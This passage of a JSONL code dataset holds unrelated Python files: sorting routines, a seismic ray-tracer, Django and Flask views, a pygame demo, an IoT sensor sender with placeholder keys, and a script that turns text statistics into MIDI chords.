\nsel.select_by_index(2)\ntime.sleep(5)\nsel.select_by_visible_text(\"Benz\")\ntime.sleep(5)\ndriver.quit()\n\n\n\n\n\n\n\n\n","sub_path":"letskodeitautomate.py","file_name":"letskodeitautomate.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112492103","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nRE = 6371.0 # Earth Radius\nRM = 3482.0 # Bottom of mantel radius\nRC = 1217.1 # Inner core radius\n# Slowness as function of r\n#\n\nclass Raytrace:\n\n def __init__(self):\n self.list_r = [] # list of values for radial coordinates\n self.list_th= [] # list of values for theta coordinates\n self.list_wave = [] # list of wave types\n \n def Vp(self, r):\n \"\"\" Vp as a function of radial position\n SOURCE: DOI: http://doi.org/10.2312/GFZ.NMSOP_r1_DS_2.1\n\n : param r : distance from Earth centre\n \"\"\"\n x = r/RE\n if(r <1217.1):\n v=11.24094-4.09689*x*x\n elif(r<3482):\n v=10.03904+3.75665*x-13.67046*x*x\n elif(r<3631):\n v=14.49470-1.47089*x\n elif(r<5611):\n v=25.1486-41.1538*x+51.9932*x*x-26.6083*x*x*x\n elif(r<5711):\n v=25.96984-16.93412*x\n elif(r<5961):\n v=29.38896-21.40656*x\n elif(r<6161):\n v=30.78765-23.25415*x\n elif(r<6251):\n v=25.41389-17.69722*x\n elif(r<6336):\n v=8.78541-0.74953*x\n elif(r<6351):\n v=6.50\n else:\n v=5.80\n return(v)\n\n def Vs(self, r):\n \"\"\" Vs as a function of radial position\n SOURCE: DOI: http://doi.org/10.2312/GFZ.NMSOP_r1_DS_2.1\n\n : param r : distance from Earth centre\n \"\"\"\n x = r/RE\n if(r <1217.1):\n v=3.56454-3.45241*x*x\n elif(r<3482):\n v=0.0\n elif(r<3631):\n v=8.16616-1.58206*x\n elif(r<5611):\n v=12.9303-21.2590*x+27.8988*x*x-14.1080*x*x*x\n elif(r<5711):\n v=20.76890-16.53147*x\n elif(r<5961):\n v=17.70732-13.50652*x\n elif(r<6161):\n v=15.24213-11.08552*x\n elif(r<6251):\n v=5.75020-1.27420*x\n elif(r<6336):\n v=6.706231-2.248585*x\n elif(r<6351):\n v=3.75\n else:\n v=3.36\n return(v)\n\n def u(self, r, wave):\n \"\"\" Return slowness for the specified wave and position\n\n : param r : distance from Earth centre\n : param wave : wave type : 'P' and 'S'\n \"\"\"\n if(wave=='P') : return(1./self.Vp(r))\n return(1./self.Vs(r))\n\n### MARKING coding 1\n def T_Delta_Int(self, r, p, wave):\n T = ((r**2)*self.u(r,wave)**2)/(r*((r**2)*self.u(r, wave)**2) - p**2)\n theta = (r*((r**2)*self.u(r, wave)**2)-p**2)\n integ = np.array([0., 0.])\n integ[0] = T\n integ[1] = theta\n return integ\n### END MARKING\n\n def Int(self, dr, p, wave):\n \"\"\" Integrate function T_Delta_Int from RE to bottom.\n Save the values of r, Delta and wave in the class lists 'list_r', \n 'list_th' and 'list_wave', used by 'plot_trajectory' to generate figures\n Return [T,Delta] for the path or [-1, 0] if the path does not exist.\n\n :param dr: radial step\n :param p : ray parameter\n :param wave : type of wave: 'P' or 'S'\n \"\"\"\n V = np.array([0., 0.])\n r = RE\n self.list_r.append(r)\n self.list_th.append(0)\n self.list_wave.append(wave)\n r+= dr*0.5 # move to middle of segment\n\n while(r*self.u(r, wave) > p): # while still going down\n V += self.T_Delta_Int(r, p, wave)*dr \n r -= dr\n self.list_r.append(r)\n self.list_th.append(V[1])\n self.list_wave.append(wave)\n if((wave == \"S\") and (r < RM)): # no S wave in outer core\n return(np.array([-1, 0]))\n \n r += dr # gone too far: move back\n### MARKING coding 1\n while (r*self.u(r, wave) <= p): \n### END MARKING\n V += self.T_Delta_Int(r, p, wave)*dr \n### MARKING coding 1\n r += dr\n### END MARKING\n self.list_r.append(r)\n self.list_th.append(V[1])\n self.list_wave.append(wave)\n\n return(V)\n \n### MARKING: coding 2\n #def Int_mPm(self, dr, p, wave):\n #def Int_mSm(self, dr, p, wave):\n #def Int_mPoSm(self, dr, p, wave): \n### END MARKING\n\n### MARKING coding 1\n\n def plot_VpVs(self):\n l = np.linspace(0, RE , 50)\n Vs=[]\n Vp=[]\n for n in range (len(l)):\n Vs.append(self.Vs(l[n]))\n Vp.append(self.Vp(l[n]))\n plt.plot(np.linspace(0,RE,50) , Vs ,'r-')\n plt.plot(np.linspace(0,RE,50) , Vp ,'b-')\n plt.ylabel(\"Vs , Vp\")\n plt.show()\n \n \n### END MARKING\n \n def plot_circle(self, R, col):\n \"\"\" Plot a circle of radius R in colour col\n\n :param R : circle radius\n :param col : circle color ('r', 'g', 'b', 'k', 'c', 'm', or 'y')\n \"\"\"\n circle2 = plt.Circle((0, 0), R, color=col, fill=False, linewidth=2)\n ax = plt.gca()\n #ax.cla() # clear things for fresh plot\n ax.add_artist(circle2)\n\n def trajectory(self, theta, wave, dr):\n \"\"\" Compute the trajectory of the specified wave \n Return Traveling time and angle (T, Delta)\n\n :param theta : incident angle in degrees\n :param path : Pm PmPm PmSm PmPoSm Sm SmPm SmSm SmPoSm\n :param dr : integration step in km\n \"\"\"\n self.list_r = []\n self.list_th = []\n self.list_wave = []\n self.theta=theta\n self.path=wave\n\n### MARKING coding 2\n th = np.radians(theta)\n p = RE*self.u(RE, wave)*np.sin(th)\n\n T, DeltaP = self.Int(dr, p, wave)\n### END MARKING\n\n return(T, np.degrees(DeltaP))\n \n \n def plot_trajectory(self):\n \"\"\" Plot the Earth Radius in green the boundary between the mantel and\n the outer core in magenta and the boundary between the 2 cores in\n red. Then plot the trajectory of the waves in black for P waves\n and blue for S waves.\n \"\"\"\n self.plot_circle(RE, \"g\")\n self.plot_circle(RM, \"m\")\n self.plot_circle(RC, \"r\")\n \n xl = []\n yl = []\n thmax = self.list_th[-1]*0.5 # to generate symmetric figure\n n = len(self.list_r) # number of data points\n wave = self.list_wave[0] # wave type\n\n### MARKING coding 1\n xl = [ ((self.list_r[i])*(np.cos(self.list_th[i]))-thmax) for i in range (n)]\n yl = [ ((self.list_r[i])*(np.sin(self.list_th[i]))-thmax) for i in range (n)]\n \n \n \n \n### END MARKING\n \n # select colour\n if(wave == \"P\") : col = \"k\"\n else: col = \"b\"\n \n plt.title(r'$\\theta=$'+str(self.theta)+\", path=\"+self.path)\n plt.plot(xl, yl, col)\n plt.axis([-8500, 8500, -6500, 6500], 'equal')\n plt.show()\n\n \n### MARKING coding 3\n # def plot_multi_trajectory(self, nocircle=False):\n### END MARKING\n\n\n\n","sub_path":"MathModelling/RayPath/ray_IASP91_v1.py","file_name":"ray_IASP91_v1.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"226948606","text":"length=int(input())\nstatistics=[]\ninit=[int(x) for x in input().split()]\nwhile len(init)>0:\n key=init[0]\n statistics.append([key,init.count(key)])\n while key in init:\n init.remove(key)\ncountOdd=0\ncountEven=0\nfor i in statistics:\n if i[0]%2==1:\n countOdd+=i[1]\n else:\n countEven+=i[1]\nprint(min(countOdd,countEven))","sub_path":"Code/CodeRecords/2868/60614/286142.py","file_name":"286142.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"281220568","text":"#!/usr/bin/env python3\n\n# QUICKSORT\n# Worst Case - Theta(n^2)\n# Average Case - Theta(nlogn)\nimport sys\nimport csv\nimport time\nimport math\n# import matplotlib.pyplot as plt\nimport random\n\nsys.setrecursionlimit(10**9)\n\nSubmission = True\nInputFile = sys.argv[1]\n\n# Storing Data as nested list, where key is element 0 of nested list\nData = dict()\nwith open(InputFile + '.csv', 'r') as csvfile:\n csv_reader = csv.reader(csvfile)\n for row in csv_reader:\n Data[int(row[0])] = list()\n for i in row[1:]:\n Data[int(row[0])].append(i)\nArr = list(Data)\n\n\ndef DetermineInputSizeList(Arr):\n j = 1\n i = 2\n InputSize = []\n while i < len(Arr):\n InputSize.append(i)\n i = 2**(j)\n j += 1\n return InputSize\n\n\ndef RandomizedPartition(Arr, p, r):\n j = random.randint(p, r)\n Arr[j], Arr[r] = Arr[r], Arr[j]\n return Partition(Arr, p, r)\n\n\ndef Partition(Arr, p, r):\n pivot = Arr[r]\n i = p - 1\n for j in range(p, r):\n if Arr[j] <= pivot:\n i += 1\n Arr[i], Arr[j] = Arr[j], Arr[i]\n # Swap Elements\n Arr[i+1], Arr[r] = Arr[r], Arr[i+1]\n return (i+1) # Return element q\n\n\ndef QuickSort(Arr, p, r):\n if (p < r):\n q = RandomizedPartition(Arr, p, r)\n QuickSort(Arr, p, q - 1)\n QuickSort(Arr, q + 1, r)\n\n\ndef TimeAlgorithm(Arr, InputSize, p, r):\n ExecTime = []\n for i in InputSize:\n StartTime = time.time()\n QuickSort(Arr[0:i], p, i-1)\n ExecTime.append(time.time() - StartTime)\n return ExecTime\n\n\ndef Graph(InputSize, ExecTime):\n plt.plot(InputSize, ExecTime)\n plt.ylabel('Runtime (s)')\n plt.xlabel('Input Size (logn)')\n plt.title('Algorithm RunTime of QUICK SORT as a Function of Input Size')\n plt.show()\n\n\np = 0\nr = len(Arr) - 1\n\nif Submission: # Submission flag\n print(f'Running QuickSort on Input Size of {len(Arr)}')\n StartTime = time.time()\n\n QuickSort(Arr, p, r)\n\n Total = time.time() - StartTime\n # Print the sorted array\n for i in Arr:\n Data[i].insert(0, i)\n print(Data[i])\n # Print the status of the dataset\n SortStatus = all(Arr[i] <= Arr[i+1]\n for i in range(len(Arr)-1)) # Check if Sorted\n print(f'Is the Dataset Sorted: {SortStatus}')\n print(Total)\nelse:\n print(f'Running QuickSort on Input Size of {len(Arr)}')\n InputSize = DetermineInputSizeList(Arr)\n ExecTime = TimeAlgorithm(Arr, InputSize, p, r)\n Graph(InputSize, ExecTime)\n","sub_path":"A1/QuickSortOpt.py","file_name":"QuickSortOpt.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"163093753","text":"\ndef html_to_int(code):\n return int(\"0x\"+code[1::],16)*256+255\n\ndef save_mask(mask,fname):\n colors = [\n \"#2E2EFE\",\n \"#00FF00\",\n \"#FF0040\",\n \"#610B0B\",\n \"#FF0040\",\n \"#00FFFF\",\n \"#FFFF00\",\n \"#848484\",\n \"#000000\",\n ]\n color_ints = [html_to_int(col) for col in colors]\n resarray = np.zeros((IMAGE_WIDTH,IMAGE_WIDTH),dtype=np.int32)\n for x in range(IMAGE_WIDTH):\n for y in range(IMAGE_WIDTH):\n sum = 0\n iters = 0\n for z in range(DROPOUT_CHANNELS):\n if mask[x][y][z] != 0:\n sum += color_ints[z]\n iters += 1\n resarray[x][y] += sum // iters if iters != 0 else 0xffffffff\n\n casted_image = np.frombuffer(resarray.tobytes(), dtype=np.uint8).reshape((IMAGE_WIDTH,IMAGE_WIDTH,4))\n Image.fromarray(casted_image,mode=\"RGBA\").save(fname)\n\n\n\ndef save_generated_image(orig_img,generated_image,generated_mask,revealed_capsules,weight_updates):\n folder = \"generated/{}/\".format(str(weight_updates))\n NUM_IMAGES_SAVE = 5\n if not os.path.exists(folder):\n for i in range(NUM_IMAGES_SAVE):\n subfold = folder+str(i)+\"/\"\n fname = subfold+\"orig.png\"\n os.makedirs(subfold)\n save_image(orig_img[i].reshape((IMAGE_WIDTH,IMAGE_WIDTH)),fname)\n for i in range(NUM_IMAGES_SAVE):\n fname = \"{}{}/{}.png\".format(folder,i,revealed_capsules)\n maskfname = \"{}{}/{}m.png\".format(folder,i,revealed_capsules)\n save_image(generated_image[i].reshape((IMAGE_WIDTH,IMAGE_WIDTH)),fname)\n save_mask(generated_mask[i],maskfname)\n","sub_path":"save_image.py","file_name":"save_image.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"56636382","text":"from django.http import JsonResponse\nfrom ...models import ProProject, HisHistory, MemMember\nfrom ...permission import Permission\nfrom .ApiResponse import ApiResponse\nfrom .Global import Global\n\n\nclass ProjectsMembersId(Global):\n\n def get(self, request, id, userid):\n\n pro = ProProject.objects.get(id=id)\n\n # Valide si le user a les droits lecture sur le projets\n if pro.getPermission(self.User) < Permission.View:\n return ApiResponse.Generate401()\n\n mem = MemMember.objects.get(pro_project_id=id, usr_user_id=userid)\n response = mem.usr_user.to_dict()\n\n return JsonResponse(response)\n\n def delete(self, request, id, userid):\n\n pro = ProProject.objects.get(id=id)\n mem = MemMember.objects.get(pro_project_id=id, usr_user_id=userid)\n\n # On peut seulement s'enlever soi-meme d'un projet, a moins qu'on soit\n # le owner\n if ((self.User is None or\n pro.getPermission(self.User) <= Permission.Edit) and\n self.User.id != userid):\n return ApiResponse.Generate401()\n\n HisHistory.log(\"DELETE\", mem, self.User)\n mem.delete()\n\n return ApiResponse.Generate204()\n","sub_path":"Focus/api/v1/ProjectsMembersId.py","file_name":"ProjectsMembersId.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"98169955","text":"# COMP3331 Assignment\n# Written by William Coulter z5113817\nimport sys\nimport threading\nimport time\n\nfrom threads.TCPServer import TCPserver\nfrom threads.UDPServer import UDPserver\nfrom threads.PingRequest import pingRequest\nfrom threads.FileRequest import fileRequest\nfrom threads.NewSuccessor import newSuccessor\nfrom threads.NewPredecessor import newPredecessor\nfrom threads.Ping import ping\n\nfrom supporting.Functions import hash, has_file\n\n# add all inputs from cmd line\npeer_id = int(sys.argv[1])\nsuccessors = [int(sys.argv[2]), int(sys.argv[3])]\npredecessors = ['2', 'elements'] \nMSS = int(sys.argv[4])\ndrop_prob = float(sys.argv[5])\n\n# run server for rest of execution\nTCPServerThread = TCPserver(peer_id, successors, predecessors, MSS, drop_prob)\nUDPServerThread = UDPserver(peer_id, successors, predecessors)\nTCPServerThread.start()\nUDPServerThread.start()\ntime.sleep(0.5)\n\n# peers ping each other throughout execution to test if alive\npingThread = ping(peer_id, successors)\npingThread.start()\ntime.sleep(0.5)\n\n# this is where cmd line input is handled\nwhile True:\n initial_input = input()\n command = initial_input.split()[0]\n \n # if request input\n if command == \"request\":\n file_no = hash(initial_input.split()[1])\n if file_no == None:\n print('Please input a valid filename between 0000 and 9999')\n continue\n\n # send request to successor\n fileRequestThread = fileRequest(peer_id, successors[0], peer_id, file_no) \n fileRequestThread.start()\n fileRequestThread.join() \n\n # if peer departure input\n elif command == \"quit\":\n print(f'Peer {peer_id} will depart from the network')\n \n # send messages to assign new predecessors and successors\n newSuccessorImmediateThread = newSuccessor(predecessors[0], [successors[0], successors[1]])\n newSuccessorThread = newSuccessor(predecessors[1], [predecessors[0], successors[0]])\n newPredecessorImmediateThread = newPredecessor(successors[0], [predecessors[0], predecessors[1]])\n newPredecessorThread = newPredecessor(successors[1], [successors[0], predecessors[0]])\n \n newSuccessorImmediateThread.start()\n newSuccessorThread.start()\n newPredecessorImmediateThread.start()\n newPredecessorThread.start()\n \n newSuccessorImmediateThread.join()\n newSuccessorThread.join()\n newPredecessorImmediateThread.join()\n newPredecessorThread.join()\n time.sleep(0.2)\n\n # not sure how to exit terminal\n sys.exit()\n else:\n print('invalid input')\n continue \n\npingThread.join()\nTCPServerThread.join()\nUDPServerThread.join()","sub_path":"cdht.py","file_name":"cdht.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"578999143","text":"\"\"\"\nBubble sort.\nhttps://en.wikipedia.org/wiki/Bubble_sort\n\nWorst case time complexity: O(n^2)\nBest case time complexity: O(n)\n\n@author Juhan Bae\n@date 5/22/2018\n\"\"\"\nfrom Sorting.Sort import Sort\n\n\nclass BubbleSort(Sort):\n def __init__(self, lst):\n \"\"\" Initialize a class BubbleSort.\n :param lst: List[Object]\n \"\"\"\n Sort.__init__(self, lst)\n\n def sort(self):\n \"\"\" Return a sorted lst.\n :return: List[Object]\n\n >>> lst = BubbleSort([5, 4, 5, 1, 7, 4])\n >>> lst.sort()\n [1, 4, 4, 5, 5, 7]\n \"\"\"\n i = len(self.lst) - 1\n while i > 0:\n for j in range(0, i):\n if self.lst[j] > self.lst[j + 1]:\n # Incorrect sort spot. swap it.\n self.lst[j], self.lst[j + 1] = self.lst[j + 1], self.lst[j]\n # Index that is completely sorted.\n i = i - 1\n return self.lst\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"Sorting/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"192525958","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template \nfrom django.template import Context\nimport pdfkit\nimport os\nfrom .models import Customers\nfrom django.contrib.auth.decorators import login_required\nfrom django import forms\n\nfrom django.contrib import auth\nfrom .forms import CustomerForm\n\n@login_required(login_url='/accounts/login')\ndef home(request):\n\n return render(request, 'bills/customer_data.html')\n\n\n\n@login_required(login_url='/accounts/login')\ndef order(request):\n \n if request.method == \"POST\":\n form=CustomerForm(request.POST)\n if form.is_valid():\n # running code that converts html to pdf using the data passed in the form\n config = pdfkit.configuration(wkhtmltopdf=\"C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe\")\n template = get_template(\"bills/order.html\")\n \n \n context = {\n 'first_name': request.POST.get('first_name'),\n 'last_name': request.POST.get('last_name'),\n 'email': request.POST.get('email'),\n 'phone': request.POST.get('phone'),\n 'street': request.POST.get('street'),\n 'city': request.POST.get('city'),\n 'post_code': request.POST.get('post_code'),\n 'county': request.POST.get('county'),\n 'number_of_products':request.POST.get('number_of_products'),\n 'price_of_product':request.POST.get('price_of_product')\n \n }\n \n html = template.render(context)\n pdfkit.from_string(html, 'out.pdf', configuration=config)\n pdf = open(\"out.pdf\",\"rb\")\n response = HttpResponse(pdf.read(), content_type='application/pdf')\n response['Content-Disposition'] = 'inline; filename=output.pdf'\n pdf.close()\n os.remove(\"out.pdf\")\n # saving the input to database and returning the converted page\n customer_data = Customers(first_name= context['first_name'],last_name=context['last_name'],email=context['email'],phone=context['phone'],street=context['street'],city=context['city'],post_code=context['post_code'],county=context['county'],number_of_products=context['number_of_products'],price_of_product=context['price_of_product']) \n customer_data.save()\n return response\n else:\n form=CustomerForm() \n else:\n form = CustomerForm()\n\n return render(request, 'bills/order.html',{'form':form})\n\n \n","sub_path":"billing/billing/bills/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"644858285","text":"# rectangle_practice.py\n# apply objects/classes\n\nimport pygame\n\n# ----- CONSTANTS\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nYELLOW = (255, 255, 0)\nSKY_BLUE = (95, 165, 228)\nWIDTH = 800\nHEIGHT = 600\nTITLE = \"Rectangle Practice\"\n\n\nclass Rectangle():\n def __init__(self):\n self.x = 0\n self.y = 0\n\n self.width = 10\n self.height = 10\n\n self.colour = (0, 255, 0)\n\ndef main():\n pygame.init()\n\n # ----- SCREEN PROPERTIES\n size = (WIDTH, HEIGHT)\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption(TITLE)\n\n # ----- LOCAL VARIABLES\n done = False\n clock = pygame.time.Clock()\n\n rectangle = Rectangle()\n rectangle_two = Rectangle()\n rectangle_two.width, rectangle_two.height = (150, 200)\n rectangle_two.x, rectangle_two.y = (50, 10)\n rectangle_two.colour = WHITE\n\n # ----- MAIN LOOP\n while not done:\n # -- Event Handler\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n # ----- LOGIC\n\n # ----- DRAW\n screen.fill(BLACK)\n pygame.draw.rect(screen, rectangle.colour, (rectangle.x, rectangle.y, rectangle.width, rectangle.height))\n pygame.draw.rect(screen, rectangle_two.colour, (rectangle_two.x, rectangle_two.y, rectangle_two.width, rectangle_two.height))\n pygame.draw.circle(screen, (0, 255, 0), (100, 100), 50)\n\n # ----- UPDATE\n pygame.display.flip()\n clock.tick(60)\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pygame/rectanglePractise.py","file_name":"rectanglePractise.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"215671602","text":"class Solution:\n def convertBST(self, root: TreeNode) -> TreeNode:\n def helper1(root, s):\n if not root: return\n helper1(root.left, s)\n s.append(root.val)\n helper1(root.right, s)\n \n def helper2(root, s):\n if not root: return\n helper2(root.left, s)\n root.val = s.pop()\n helper2(root.right, s)\n\n s1, s2 = [], []\n helper1(root, s1)\n\n while s1:\n if not s2:\n s2.append(s1.pop())\n else:\n s2.append(s2[-1] + s1.pop())\n \n helper2(root, s2)\n return root","sub_path":"Tree/convert_bst_to_greater_tree.py","file_name":"convert_bst_to_greater_tree.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"117422830","text":"\"\"\"\n\nDeviceHUB.net sample code for sending a string, an analog sensor and a digital sensor.\n\nIn this example the string and the sensors are random simulated.\n\nFirst install Python API wrapper for devicehub \nhttps://github.com/devicehubnet/devicehub_py\n\ncreated 30 June 2015\nby Mihnea Moldovan\n\n\"\"\"\n\n\nfrom devicehub.devicehub import Sensor, Actuator, Device, Project\nfrom random import randint\nfrom time import sleep\n\n\nPROJECT_ID = 'paste_your_PROJECT_ID_here'\nDEVICE_UUID = 'paste_your_DEVICE_UUID_here'\nAPI_KEY = 'paste_your_API_KEY_here'\nAN_SENSOR_NAME = 'paste_your_analog_SENSOR_NAME_here'\nDI_SENSOR_NAME = 'paste_your_digital_SENSOR_NAME_here'\nSTRING_NAME = 'paste_your_STRING_NAME_here'\n\n#string simulation\ndata = \"StringTest\"\n\nproject = Project(PROJECT_ID, persistent = True)\ndevice = Device(project, DEVICE_UUID, API_KEY)\n\nDI_SENSOR = Sensor(Sensor.DIGITAL, DI_SENSOR_NAME)\nAN_SENSOR = Sensor(Sensor.ANALOG, AN_SENSOR_NAME)\nSTR = Sensor(Sensor.STRING, STRING_NAME)\n\ndevice.addSensor(DI_SENSOR)\ndevice.addSensor(AN_SENSOR)\ndevice.addSensor(STR)\n\n\nwhile True:\n DI_SENSOR.addValue(randint(0, 1))\n sleep(0.5)\n AN_SENSOR.addValue(randint(1, 100))\n sleep(0.5)\n STR.addValue(data)\n device.send()\n sleep(1)","sub_path":"mqtt/python/send_string_analog_digital_sensors.py","file_name":"send_string_analog_digital_sensors.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"65800267","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\n\n\n# Catégories de partenaires\nclass of_partner_categ(models.Model):\n \n _name = \"of.partner.categ\"\n \n name = fields.Char(u'Catégorie', size=32)\n parent_id = fields.Many2one('of.partner.categ', 'Catégorie parente', select=True, ondelete='restrict')\n \n _constraints = [\n (models.Model._check_recursion, 'Error ! You can not create recursive category.', ['parent_id'])\n ]\n\n # Pour afficher la hiérarchie des catégories\n @api.multi\n def name_get(self):\n if not self._ids:\n return []\n res = []\n for record in self:\n name = [record.name]\n parent = record.parent_id\n while parent:\n name.append(parent.name)\n parent = parent.parent_id\n name = ' / '.join(name[::-1])\n res.append((record.id, name))\n return res\n\n\n\nclass res_partner(models.Model):\n \n _inherit = 'res.partner'\n \n of_categ_id = fields.Many2one('of.partner.categ', u'Catégorie', required=False, ondelete='restrict')","sub_path":"of_partner_categ/of_partner_categ.py","file_name":"of_partner_categ.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"320883434","text":"import numpy as np\nimport pandas as pd\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom midiutil import MIDIFile\n\nclass Genre:\n \"\"\"Class to define chords and write to output .mid file\"\"\"\n # Major chords\n a_flat = [56, 60, 63]\n b_flat = []\n c_maj = [48, 52, 55]\n f_maj = [53, 57, 60]\n g_maj = [55, 59, 62]\n\n # Minor chords\n a_min = [57, 60, 64]\n b_flat_min = [58, 62, 65]\n c_min = [48, 51, 55]\n d_min = [50, 53, 56]\n e_min = [52, 55, 59]\n f_min = [53, 56, 60]\n g_min = [55, 58, 62]\n\n # 2-5-1 Jazz chord progression\n d_maj7 = [50, 53, 57, 48]\n g_maj7 = [55, 59, 50, 53]\n c_maj7 = [48, 52, 55, 59]\n\n #chords to be used in the output\n chord_prog_pop = [c_maj, a_min, f_maj, g_maj, d_maj7, g_maj7, c_maj7]\n\n track = 0\n channel = 7\n time = 0 # In beats\n duration = 1 # In beats\n tempo = 120 # In BPM\n volume = 100 # 0-127, as per the MIDI standard\n\n def make_midi(self, chordprog, durations):\n \"\"\"method to write to output file\"\"\"\n midi = MIDIFile(1)\n midi.addTempo(self.track, self.time, self.tempo)\n\n time = 0\n for i, chord in enumerate(chordprog):\n d = durations[i]\n for j, pitch in enumerate(chord):\n midi.addNote(self.track, self.channel, pitch, time, d, self.volume)\n time += d\n\n # Writes .midi file\n with open(\"od.mid\", \"wb\") as output_file:\n midi.writeFile(output_file)\n\nsentences = []\n\nvowels = ['a','e','i','o','u','y']\n\n#read in large text file, sanitize input\nwith open(\"dec.txt\", \"r\", encoding='utf-8') as f:\n content = f.read()\n sentences = [x.strip() for x in content.replace('\\n',' ').replace(';','.').replace(':','.').replace('_','').replace('\"','.').replace('“','.').replace('”','.').split('.') if len(x.strip().split()) > 5]\n print(content.replace('\\n',' ').replace(';','.').replace(':','.').replace('_','').replace('\"','.').replace('“','.').replace('”','.'))\n\n#method to estimate the number of syllables in a word (accurate to +/- 1 syllable)\ndef est_syl(word):\n if len(word) == 1:\n return 1\n word = word.lower()\n count = 0\n for i in range(len(word) - 1):\n if word[i] in vowels and (word[i+1] not in vowels or i == len(word)-2):\n count += 1\n return count\n\n#analyzes the three datapoints of a sentence: len, avg word len, num syllables\ndef mk_datapoint(sentence):\n sentence = sentence.split()\n words = len(sentence)\n syls = sum([est_syl(word) for word in sentence])\n avg = np.mean(list(map(lambda x: len(x), sentence)))\n return [words,avg,syls]\n\n#colormap function for plotting\ndef get_cmap(n, name='hsv'):\n return plt.cm.get_cmap(name, n)\n\n#display a nice looking plot of all the clusters\ndef show_plot(nclusters, df):\n\n kmeans = KMeans(n_clusters=nclusters)\n kmeans.fit(df)\n\n labels = kmeans.predict(df)\n\n centroids = kmeans.cluster_centers_\n cmap = get_cmap(nclusters)\n colmap = {\n i: cmap(i)\n for i in range(nclusters)\n }\n\n fig = plt.figure()\n colors = list(map(lambda x: colmap[x], labels))\n\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(df[0], df[1], df[2], color=colors, alpha=0.5, edgecolor='k')\n\n for idx, centroid in enumerate(centroids):\n ax.scatter(*centroid, color=colmap[idx])\n\n ax.set_xlabel('Num_Words')\n ax.set_ylabel('Avg_L')\n ax.set_zlabel('Num_Syl')\n\n plt.show()\n\n return df\n\n#k-means clustering\ndef kcluster(nclusters, df):\n\n kmeans = KMeans(n_clusters=nclusters)\n kmeans.fit(df)\n\n labels = kmeans.predict(df)\n\n centroids = kmeans.cluster_centers_\n\n return list(labels)\n\ncs = Genre.chord_prog_pop\n\ndpoints = list(map(lambda x: mk_datapoint(x), sentences))\ndf = pd.DataFrame(data=np.array(dpoints))\n\nshow_plot(len(cs), df)\n\nchords = kcluster(len(cs), df)\n\nd = {\n i: 0\n for i in range(len(cs))\n}\n#print(np.max(dpoints[0]))\ndurations = [dp for dp in df[0]]\n#durations = list(map(lambda x: map_length(x), df[0]))\n\nmin_d = np.min(durations)\nmax_d = np.max(durations)\n\n#choose duration of each chord as a function of sentence length\ndurations = [round(4 * (d - min_d)/(max_d - min_d))/4 * 7 + 0.5 for d in durations]\nprint(durations)\nfor c in chords:\n d[c] += 1\n\n#song = np.random.choice(list(d.keys()), 300, p=[x / len(sentences) for x in list(d.values())])\nl = list(range(len(chords)))\nplt.scatter(l,chords)\nplt.plot(l, chords)\nplt.show()\n\nchord_prog = [cs[i] for i in chords]\ng = Genre()\n\n#create the output music file\ng.make_midi(chord_prog, durations)\n","sub_path":"ttm.py","file_name":"ttm.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"37967695","text":"#!/usr/bin/python3\n\"\"\"\nReturns the status of the API\n\"\"\"\n\nfrom models import storage\nfrom api.v1.views import app_views\nfrom flask import Flask, jsonify, make_response\nfrom flask_cors import CORS\nfrom os import getenv\n\nHOST = getenv('HBNB_API_HOST', \"0.0.0.0\")\nPORT = getenv('HBNB_API_PORT', 5000)\n\n# enable CORS for app_views blueprint\ncors = CORS(app_views, resources={r\"/*\": {\"origins\": HOST}})\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\napp.config['JSONIFY_PRETTYPRINT_REGULAR'] = True\n# registers the blueprint app_views to your Flask instance app\napp.register_blueprint(app_views)\n\n\n@app.errorhandler(404)\ndef error_404(err):\n \"\"\"Produce a 404 error message\"\"\"\n return make_response(jsonify(error=\"Not found\"), 404)\n\n\n@app.teardown_appcontext\ndef 